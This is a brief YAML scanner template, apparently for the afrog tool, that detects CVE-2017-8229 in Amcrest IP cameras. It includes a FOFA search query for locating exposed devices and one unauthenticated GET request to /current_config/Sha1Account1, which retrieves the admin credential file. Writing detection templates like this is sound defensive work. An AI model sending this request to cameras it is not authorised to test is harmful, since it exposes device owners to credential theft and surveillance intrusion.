漏洞描述
Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据
fofa: "Amcrest"
id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞
author: zan8in
severity: critical
description: |-
Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据
fofa: "Amcrest"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
tags: cve,cve2017,amcrest,info
created: 2023/07/13
rules:
r0:
request:
method: GET
path: /current_config/Sha1Account1
expression: response.status == 200 && response.body.bcontains(b'"DevInformation" :') && response.body.bcontains(b'"SerialID" :') && response.body.bcontains(b'"AuthorityList" :')
expression: r0()